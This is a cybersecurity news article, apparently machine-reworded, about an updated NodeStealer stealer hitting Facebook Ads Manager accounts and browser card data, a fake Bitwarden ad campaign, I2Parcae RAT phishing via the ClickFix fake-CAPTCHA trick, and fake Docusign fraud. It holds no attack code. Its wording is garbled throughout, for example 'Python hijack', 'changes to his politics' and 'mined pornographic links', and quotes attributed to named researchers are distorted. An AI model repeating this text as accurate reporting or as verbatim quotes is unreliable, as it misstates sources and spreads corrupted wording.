Threat hunters warn of an updated Python-based version NodeStealer it is now equipped to extract more information from victims’ Facebook Ads Manager accounts and collect credit card data stored in web browsers.
“They collect detailed information about the budget of their victims’ Facebook Ads Manager accounts, which can be a gateway to malicious Facebook advertising,” Ian Michael Alcantara, researcher at Netskope Threat Labs. said in a report shared with The Hacker News.
“New techniques used by NodeStealer include using Windows Restart Manager to unlock browser database files, add unnecessary code, and use batch scripting to dynamically generate and execute a Python script.”
NodeStealerfirst publicly documented by Meta in May 2023, began as JavaScript malware before evolving into a Python hijack capable of collecting data associated with Facebook accounts to facilitate its takeover.
It is believed to have been developed by Vietnamese threat actors who have a history using different malware families which are centered around hijacking Facebook ads and business accounts to instigate other malicious activities.
Netskopke’s latest analysis shows that NodeStealer artifacts have begun targeting Facebook Ads Manager accounts used to manage Facebook and Instagram ad campaigns, in addition to hitting Facebook Business accounts.
At the same time, it is assumed that the intention of attackers is not only to take control of Facebook accounts, but also to use them as a weapon for use in malicious campaigns which further distribute malware under the guise of popular programs or games.
“We recently found several Python NodeStealer samples that collect account budget information using the Facebook Graph API,” explained Michael Alcantara. “The samples initially generate an access token by logging into adsmanager.facebook(.)com using cookies collected on the victim’s machine.”
In addition to collecting tokens and business information associated with these accounts, the malware includes verification that is clearly designed to avoid infecting machines located in Vietnam as a way to evade law enforcement, further cementing its origins.
In addition, certain NodeStealer samples have been found to use the legitimate Windows Restart Manager to unlock SQLite database files that may be in use by other processes. This is done in order to retrieve credit card details from different web browsers.
The data theft is carried out using Telegram, emphasizing that the messaging platform is still a a critical vector for cybercriminals in spite of recent changes to his politics.
Malicious advertising through Facebook is a lucrative infection route, often masquerading as trusted brands to spread all kinds of malware. This is evidenced by the emergence of a new campaign that started on November 3, 2024, which impersonated the Bitwarden password manager software through Facebook-sponsored ads to install a fake Google Chrome extension.
“The malware collects personal data and targets Facebook business accounts, which can lead to financial losses for individuals and businesses,” Bitdefender said. said in a report released Monday. “Once again, this campaign highlights how threat actors are using trusted platforms like Facebook to lure users into compromising their own security.”
Phishing emails distribute the I2Parcae RAT via the ClickFix technique
The development comes after Cofense warned of new phishing campaigns using website contact forms and invoice-themed lures to deliver malware families such as the I2Parcae RAT and PythonRatLoaderrespectively, with the latter acting as a conduit to deploy AsyncRAT, DCRat, and Venom RAT.
I2Parcae “is notable for having several unique tactics, techniques, and procedures (TTPs), such as evasion of the Secure Email Gateway (SEG) by proxying emails through legitimate infrastructure, forging CAPTCHAs, abusing Windows functionality hard-coded to hide leaked files, and C2 capabilities over the Invisible Internet Project (I2P), an anonymous peer-to-peer network with encryption. Cofense researcher Kang An said.
“When infected, I2Parcae is capable of disabling Windows Defender, enumerating Windows Security Accounts Manager (SAM) for accounts/groups, stealing browser cookies and remote access to infected hosts.”
Attack chains involve distributing mined pornographic links in e-mail messages that, when clicked, take recipients to an intermediate fake CAPTCHA page that prompts victims to copy and execute a coded PowerShell script to access the content, a method dubbed ClickFix.
ClickFix, in recent months, has become a popular social engineering trick to lure unsuspecting users into downloading malware under the guise of fixing a supposed bug or passing a reCAPTCHA check. It is also effective at bypassing security controls due to users infecting themselves by executing code.
Enterprise security firm Proofpoint said the ClickFix technique is being used by numerous unattributed threat actors to deliver an array of remote access Trojans, stealers and even post-exploitation frameworks such as Brute Ratel C4. It even happened were adopted by suspects in Russian espionage disrupt the state structures of Ukraine.
“Threat actors have recently been seen using ClickFix’s fake CAPTCHA technique, which pretends to authenticate the user with a ‘Verify You’re Human’ (CAPTCHA) verification,” security researchers Tommy Majar and Selena Larson said. “Much of the activity is based on an open source toolkit called reCAPTCHA phish available on GitHub for “educational purposes”.
“What’s insidious about this technique is that the adversaries prey on people’s innate desire to be useful and independent. By offering what appears to be both a problem and a solution, people feel empowered to “fix” the problem themselves without having to contact IT. team or anyone else, and it bypasses security protections, forcing the person to infect themselves.”
The disclosure also coincides with an increase in phishing attacks that use fake Docusign requests to evade detection and ultimately commit financial fraud.
“These attacks present a dual threat to contractors and suppliers – immediate financial loss and potential business disruption,” SlashNext said. “If a false document is signed, it can trigger unauthorized charges while creating confusion about the actual status of the license. This uncertainty could lead to delays in bidding for new projects or maintaining existing contracts.”
